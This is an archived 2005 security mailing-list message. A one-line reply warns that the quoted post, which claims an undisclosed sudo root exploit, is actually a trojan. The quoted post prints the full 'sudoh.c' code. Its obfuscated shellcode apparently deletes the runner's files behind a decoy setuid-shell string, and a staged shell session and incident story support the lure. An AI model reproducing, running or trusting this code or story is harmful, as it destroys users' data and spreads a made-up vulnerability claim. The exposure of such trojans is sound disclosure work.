Re: [Full-disclosure] Undisclosed Sudo Vulnerability ?

From: Kurt Seifried (listuser_at_seifried.org)
Date: 07/31/05

  • Next message: Neville Aga: "[Full-disclosure] RE: Cisco IOS Shellcode Presentation" 
    To: <full-disclosure@lists.grok.org.uk>
Date: Sat, 30 Jul 2005 20:26:14 -0600

    This is a trojan that will nuke all the files owned by the user running it.

    -Kurt

    ----- Original Message -----
    From: "Esler, Joel - Contractor" <joel.esler@rcert-s.army.mil>
    To: <full-disclosure@lists.grok.org.uk>
    Sent: Saturday, July 30, 2005 12:40 PM
    Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?

    > About two weeks ago, our proprietary LIDS detected some suspicious shell
    > activity on an internal .mil machine i am in charged of. Our server runs
    > latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
    > Before shutting down the machine and reinstalling it from scratch, we
    > installed sebek module to monitor all shell activity. Based on the data
    > we gathered, it seems the attacker gained root privileges using an
    > undisclosed bug in latest sudo.
    >
    > $ uname -a
    > Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686
    > GNU/Linux
    >
    > $ sudo -V
    > Sudo version 1.6.8p9
    >
    > $ ls -al /tmp/.phc
    > -rwsr-xr-x 1 root root 304873 Jul 05 03:45 /tmp/.phc
    >
    > Here is an excerpt of a shell session we recorded:
    >
    > <.........>
    > $ cat >blaat.uue<<'EH'
    >

    --------------------------------------------------------------------------------

    > EH
    > $ uudecode blaat.uue
    > $ cat sudoh.c
    > /*
    > * off by one ebp overwrite in sudo prompt parsing func (bground mode
    > only)
    > *
    > * "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard
    > Johnson
    > *
    > * gcc -pipe -o sudoh sudoh.c ; ./sudoh
    > *
    > * happy deathday route
    > *
    > */
    >
    > #include <stdio.h>
    > #include <unistd.h>
    > #include <string.h>
    > #include <alloca.h>
    >
    >
    > #define SUDO_PROMPT "%u@%h> \\%"
    > #define shellcode esp
    > #define RETS_NUM 246 /* generic */
    > #define NOPS_NUM 116 /* generic */
    >
    >
    > /*
    > * Linux x86 non-interactive exec
    > * {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
    > */
    >
    > char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
    > = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    > "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    > "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    > "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    > "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    > "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    > "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    > "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
    > /* = "\xcc\xeb\xfe"; */
    >
    >
    >
    > void fill (char *buff, int size, unsigned long val)
    > {
    > unsigned long *ptr = (unsigned long *) buff;
    >
    > for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ =
    > val;
    > }
    >
    >
    > unsigned long get_sp (void)
    > {
    > __asm__ ("lea esp, %eax");
    > }
    >
    >
    > char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
    > {
    > int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen
    > (shellcode);
    > unsigned char *nops = alloca (nops_nums);
    > unsigned char *rets = alloca (rets_nums);
    > unsigned long ret = get_sp ();
    > static char exp_buffer [8192];
    >
    > /* make sure sudo isatty() fails */
    > close (0); close (1); close (2);
    >
    > fill (nops, (unsigned char) nops_nums, 0x90909090);
    > fill (rets, (unsigned char) rets_nums, ret);
    >
    > /* be nice plz */
    > if (size > sizeof (exp_buffer)) {
    > fprintf (stderr, "buffer's t00 small..\n");
    > return NULL;
    > }
    >
    > snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
    > SUDO_PROMPT, /* evilz prompt */
    > nops,
    > shellcode,
    > rets);
    >
    > /* exploit buff */
    > return exp_buffer;
    > }
    >
    >
    >
    > int main(int argv, char *argc[])
    > {
    > char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);
    >
    > /* thanks again T0dd :) */
    >
    > execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit,
    > "/bin/false", NULL);
    >
    > /* ok, shellroot should await you @ "HISTFILE=/dev/null
    > /tmp/.phc -p" */
    >
    > return 0;
    > }
    >
    > $ gcc -pipe -o sudoh sudoh.c
    > {standard input}: Assembler messages:
    > {standard input}:5: Warning: Ignoring changed section attributes for .text
    > $ ./sudoh
    > $ cat /bin/cat > blaat.uue; rm blaat.uue
    > $ cat /bin/cat > sudoh.c; rm sudoh.c
    > $ cat /bin/cat > sudoh; rm sudoh
    > $ HISTFILE=/dev/null /tmp/.phc -p
    > id
    > uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
    > <.........>
    >
    >
    > Todd Miller, the maintainer of Sudo has been informed yesterday, and it
    > is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.
    >
    >
    > J
    >
    > Joel Esler, GCIA
    > joel.esler@rcert-s.army.mil
    > 706-791-7165 DSN: 780-7165
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    > Hosted and sponsored by Secunia - http://secunia.com/
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/

  • Next message: Neville Aga: "[Full-disclosure] RE: Cisco IOS Shellcode Presentation"

    Relevant Pages